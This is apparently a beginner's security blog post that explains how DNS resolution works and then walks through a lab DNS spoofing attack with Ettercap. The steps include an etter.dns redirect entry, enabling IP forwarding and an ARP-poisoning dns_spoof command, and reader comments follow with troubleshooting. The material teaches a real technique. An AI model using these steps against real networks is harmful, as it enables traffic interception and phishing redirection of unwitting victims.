Infosec 101: DNS – What is it and How do I Spoof it?

July 8, 2016 | Views: 9918

Begin Learning Cyber Security for FREE Now!

FREE REGISTRATIONAlready a Member Login Here

DNS stands for Domain Name System and it does the job of translating the name of websites you enter in the address bar into an IP address. 

When you enter www.google.com into the address bar, it gets translated to the respective IP address and after that, a connection is established. 

Here’s how the process goes:

1. You enter the hostname www.xyz.com into the address bar

2. Your computer searches for the IP in the local DNS cache. If it’s not found, a DNS query is performed.

3. The query is sent to recursive name servers – these are with your ISP and have their own cache.

4. If the recursive servers don’t have the answer, they will query the root nameserver.

5. The root nameserver will look at your request from right to left for TLD (.com , .in , .us)

6. The query is then directed to the top level domain (TLD) nameserver

7. The query is looked at (from right to left minus the TLD part) for specific domain.

8. Finally, the query goes to the authoritative DNS servers. These know everything there is to know about a domain. These have DNS records like – A, mx etc. and the recursive server will retrieve the record and give it back to you.

 

Common DNS records:

A = forward DNS lookup

MX = mail exchange record

PTR = reverse DNS lookup

 

What’s a nameserver?

A computer that’s permanently connected to the internet and translates a domain name into an IP address.

 

What’s Ettercap?

Ettercap is a free and open source network security tool for man-in-the-middle attacks on a LAN. It can be used for computer network protocol analysis and security auditing

 

Spoofing DNS using Ettercap

The victim will try to connect to msn.com and instead will see the attacker hosted webpage.

Scenario: 2 machines – Kali Linux and Windows 8

On Kali Linux

1. locate a file by the name etter.dns

#locate etter.dns

the file will be under /etc/ettercap

open the file using the nano editor

scroll down and you’ll ee a line

*wildcards in PTR are not allowed

there will be examples given and like them, add your entry.

for instance -> www.msn.com A 192.168.1.8

where A is the DNS record, and the IP is of your Kali Linux machine

ave and exit.

2.  go to this directory

/proc/sys/net/ipv4

there will be a file by the name ip_forward.

open the file with nano and you’ll find that it’s set to 0. make it 1.

save and exit.

3. use the dns_spoof plugin of ettercap

# ettercap -T -q -M arp:remote -P dns_spoof //

and the plugin will start

(enter q to abort)

(enter ettercap –help to see options)

go to your Windows machine and ping the msn website.

you’ll see that reply being received is from 192.168.1.8 – the Kali machine – instead of the msn.com’s IP.

Smilarly, if you were to enter www.msn.com in the browser on Windows, you’ll be redirected to the Kali Linux machine where you can host your own page for malicious / non malicious intent.

All of this will make much more sense if you familiarize yourself with ARP spoofing.


That’s all for this post. Queries are welcome in the comments.

Share with Friends
FacebookTwitterLinkedInEmail
Use Cybytes and
Tip the Author!
Join
Share with Friends
FacebookTwitterLinkedInEmail
Ready to share your knowledge and expertise?
25 Comments
  1. Good Directions, Thnk you for the post.
    Does windows have a version of ettercap? Can you go over how to do a dns posion for both windows machines?

  2. Thank very much for your time and help i really apperciate

  3. This should really be in a video because there’s not enough explanation. It almost reads as a shopping list.

    • I wish video tutorial was possible but it isn’t.
      Thanks for the feedback, I’ll try to make the next article more indulging and less like a ‘shopping list’.

    • I don’t really see where any user seriously looking into a future in IT related industry would struggle to comprehend or follow these directions to be honest.
      Sure it hasn’t been structured to be the most aesthetically pleasing of compositions but it outlines the necessary inputs, the order in which they are required, as well as an expected output……

  4. i have followed all the steps, but does not work

    • Bud my both machines are in vm ware . was that a problem.

    • But my both machines are in vm ware . was that a problem.

      • The only thing to make sure is the fact that you are on the same network as the victim.
        Let’s say that your IP is 192.168.1.5.
        Now your victim should also have IP in the range 192.168.1.x
        where x can have values starting from 2 (192.168.1.2 for example).
        That’s all you need to take care of.
        If you are in the VM, look at the network connection settings and check if the network connection is bridged or NAT.
        Make sure that either both are NAT or both bridged.
        Just so you know that in case of NAT the IP is provided by the VMware DHCP instead of your router.
        follow the steps again and try to find out the exact step you are having problem with.

  5. I didn’t get the First step,
    Me i am a beginner i please may you tell me in details??
    Thax

    • Ettercap is a Linux tool. Here, in these steps, it is not mentioned how to install Ettercap. So, before starting, search for how to install Ettercap. After you have installed Ettercap, go to the mentioned directory ie. ‘/etc/ettercap’ and locate the file ‘etter.dns’. To edit the file using ‘nano’ text editor, open the terminal and type: “cd /etc/ettercap” without quotes and then type “nano etter.dns” also without quotes. This will open the file and now you will be able to edit it. If you don’t want to use nano, or want to open file with editors like gEdit or something else, just replace ‘nano’ with the name of your editor. Now you can follow the rest of the steps.

      ** If you are using kali Linux, then ettercap is already installed.

      • KRYPGUY , I appreciate you helping out fellow cybrarian.
        JOSHUA GEEK try to follow what KRYPGUY told and see if you can understand.

Page 3 of 3«123
Comment on This

You must be logged in to post a comment.

Our Revolution

We believe Cyber Security training should be free, for everyone, FOREVER. Everyone, everywhere, deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is a free community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

Cybrary On The Go

Get the Cybrary app for Android for online and offline viewing of our lessons.

Get it on Google Play
 

Support Cybrary

Donate Here to Get This Month's Donor Badge

 
Skip to toolbar

We recommend always using caution when following any link

Are you sure you want to continue?

Continue
Cancel